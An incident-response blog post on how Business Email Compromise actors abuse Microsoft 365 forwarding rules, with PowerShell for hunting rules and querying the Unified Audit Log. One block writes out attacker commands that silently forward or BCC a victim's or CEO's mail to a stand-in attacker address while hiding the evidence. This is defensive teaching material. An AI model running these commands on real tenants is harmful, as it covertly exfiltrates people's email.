In this blog, we present various scenarios in which threat actors can utilise email forwarding rules, together with the associated evidence in the Unified Audit Log (UAL). Additionally, we have created a comprehensive mind map that summarises the contents of the blog for use in incident detection and response investigations.
Email forwarding rules
In this blog we discuss a threat actor technique that we summarise as ‘email forwarding rules’. In many Business Email Compromise (BEC) cases a threat actor gains access to a victim’s email environment and configures an email forwarding rule. There are two main motivations for doing so: first as a persistence mechanism (MITRE ATT&CK T1137.005, Office Application Startup: Outlook Rules) and second as a method to collect emails (T1114.003, Email Collection: Email Forwarding Rule).
Mailbox vs Transport rules
There are two types of rules:
- Mailbox rule
- Transport rule
A mailbox or inbox rule is configured on a per-mailbox basis and can be created by the owner of the mailbox, by an administrator, or by a delegate with sufficient permissions on that mailbox.
A transport or mail flow rule applies to the entire mail flow of an organisation and can only be configured by users holding administrative roles/permissions. More details on transport rules can be found in the official documentation.
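To make the difference between the two rule types concrete, the following is an added example (not code from the original post) showing how each type of forwarding rule is created and, more usefully for an investigator, how to enumerate both across a tenant. It assumes the ExchangeOnlineManagement module, an account holding the Exchange administrator role for the transport rule part, and placeholder addresses (admin@contoso.com, victim@contoso.com, ceo@contoso.com, attacker@example.net) that are not from the original post.

```powershell
# Added example, not code from the original post. Assumes the ExchangeOnlineManagement
# module and placeholder addresses; the transport rule part needs an admin role.
Connect-ExchangeOnline -UserPrincipalName admin@contoso.com

# --- Mailbox (inbox) rule: scoped to a single mailbox --------------------------
# This is the shape a BEC actor typically creates after taking over a session:
# forward every message to an external address, mark it read and delete the
# original so the victim's inbox looks untouched. A one-character rule name such
# as "." is a common choice because it is easy to overlook in the rules dialog.
New-InboxRule -Mailbox victim@contoso.com -Name "." `
    -ForwardTo attacker@example.net `
    -MarkAsRead $true -DeleteMessage $true

# --- Transport (mail flow) rule: scoped to the whole organisation --------------
# Requires an administrative role. Silently BCCs every message sent to the CEO;
# nothing about this is visible from inside the victim mailbox.
New-TransportRule -Name "Archive copy" `
    -SentTo ceo@contoso.com `
    -BlindCopyTo attacker@example.net

# --- Investigator checks: enumerate both rule types -----------------------------
# Inbox rules that forward or redirect mail, across every mailbox in the tenant.
# .Count is used because the forwarding properties are collections (0 = unset).
Get-Mailbox -ResultSize Unlimited | ForEach-Object {
    Get-InboxRule -Mailbox $_.UserPrincipalName |
        Where-Object {
            $_.ForwardTo.Count -gt 0 -or
            $_.ForwardAsAttachmentTo.Count -gt 0 -or
            $_.RedirectTo.Count -gt 0
        } |
        Select-Object MailboxOwnerId, Name, Enabled, ForwardTo,
                      ForwardAsAttachmentTo, RedirectTo, DeleteMessage
}

# Transport rules that copy or redirect mail to another recipient.
Get-TransportRule |
    Where-Object {
        $_.BlindCopyTo.Count -gt 0 -or
        $_.CopyTo.Count -gt 0 -or
        $_.RedirectMessageTo.Count -gt 0
    } |
    Select-Object Name, State, Priority, WhenChanged,
                  BlindCopyTo, CopyTo, RedirectMessageTo

# Caveat for the inbox rule case: the default outbound spam policy
# (AutoForwardingMode = Automatic) blocks automatic forwarding to external
# domains, so the rule above only delivers if an admin relaxed that setting.
# Check it, because a rule that exists but cannot deliver changes the impact.
Get-HostedOutboundSpamFilterPolicy | Select-Object Name, AutoForwardingMode
```

The enumeration part shows the current state of the tenant only; a rule that the actor created and later removed will not appear here, which is exactly why the UAL evidence discussed below matters.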
Unified Audit Log
The UAL is a crucial log source for incident response in Microsoft 365 tenants. It captures both user- and admin-initiated actions and is enabled by default for most tenants, although this is worth verifying at the start of an investigation. While we won’t delve into the specifics of acquiring or processing this data in this blog post, we’ve included links to relevant resources in the Resources section for those who need more information.
Threat actors have several techniques at their disposal when creating an email forwarding rule. They can configure a mailbox rule through the web GUI (https://outlook.office.com/), through an email client such as Outlook, or through PowerShell or an API. The following scenarios outline the possible methods for creating a mailbox rule:
- New mailbox rule: a new rule is created on a mailbox;
- An existing mailbox rule is…
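Whichever of the methods above the actor uses, the rule change is recorded in the UAL as an Exchange operation. As an added example (not code from the original post), the following query pulls the operations tied to mailbox and transport rule creation and modification, checks that the UAL is actually being populated first, and flattens the AuditData JSON into one row per event with the forwarding destination. It assumes the ExchangeOnlineManagement module, an account with the Audit Logs role, and a 90-day window; the session ID and the CSV path are arbitrary choices.

```powershell
# Added example, not code from the original post. Assumes ExchangeOnlineManagement
# and an account holding the Audit Logs role; window, session ID and CSV path are
# arbitrary.
Connect-ExchangeOnline -UserPrincipalName admin@contoso.com

# Confirm UAL ingestion is on before relying on it as evidence.
if (-not (Get-AdminAuditLogConfig).UnifiedAuditLogIngestionEnabled) {
    Write-Warning "Unified audit log ingestion is disabled in this tenant"
}

# Operations that record creation or change of forwarding rules. Rules created in
# OWA or via PowerShell/API are logged as New-InboxRule / Set-InboxRule; rules
# created in the Outlook desktop client are logged as UpdateInboxRules instead.
$ops = 'New-InboxRule', 'Set-InboxRule', 'Enable-InboxRule', 'UpdateInboxRules',
       'New-TransportRule', 'Set-TransportRule', 'Enable-TransportRule'

$start     = (Get-Date).AddDays(-90)
$end       = Get-Date
$sessionId = "fwdrules-$(Get-Date -Format yyyyMMddHHmmss)"
$records   = @()
do {
    # ReturnLargeSet pages through up to 50 000 results for one session ID;
    # the loop ends when a call returns nothing more for that session.
    $page = Search-UnifiedAuditLog -StartDate $start -EndDate $end -Operations $ops `
                -ResultSize 5000 -SessionCommand ReturnLargeSet -SessionId $sessionId
    $records += $page
} while ($page)

# Parameter names that carry a forwarding destination for either rule type.
$fwdParams = 'ForwardTo', 'ForwardAsAttachmentTo', 'RedirectTo',
             'BlindCopyTo', 'CopyTo', 'RedirectMessageTo'

$rows = foreach ($r in $records) {
    $d = $r.AuditData | ConvertFrom-Json
    $p = @{}
    # Cmdlet-style events expose the rule settings as Name/Value pairs.
    foreach ($param in $d.Parameters) { $p[$param.Name] = $param.Value }
    # UpdateInboxRules events (Outlook client) keep their details in
    # OperationProperties rather than Parameters, so ForwardsTo stays empty for
    # them; they still surface with actor, client IP and mailbox for manual triage.
    [pscustomobject]@{
        Time       = $d.CreationTime
        Operation  = $d.Operation
        Actor      = $d.UserId
        ClientIP   = $d.ClientIP
        Target     = $d.ObjectId
        RuleName   = $p['Name']
        ForwardsTo = (($fwdParams | ForEach-Object { $p[$_] }) | Where-Object { $_ }) -join ';'
        DeleteMsg  = $p['DeleteMessage']
    }
}

# Triage view, newest first, plus a CSV for the case file.
$rows | Sort-Object Time -Descending |
    Format-Table Time, Operation, Actor, ClientIP, RuleName, ForwardsTo, DeleteMsg -AutoSize
$rows | Export-Csv -NoTypeInformation -Path .\forwarding-rule-events.csv
```

Actor and ClientIP are the fields to pivot on next: a rule created by the mailbox owner from an unfamiliar IP, or by a delegate account that should never touch that mailbox, is the usual tell in a BEC case.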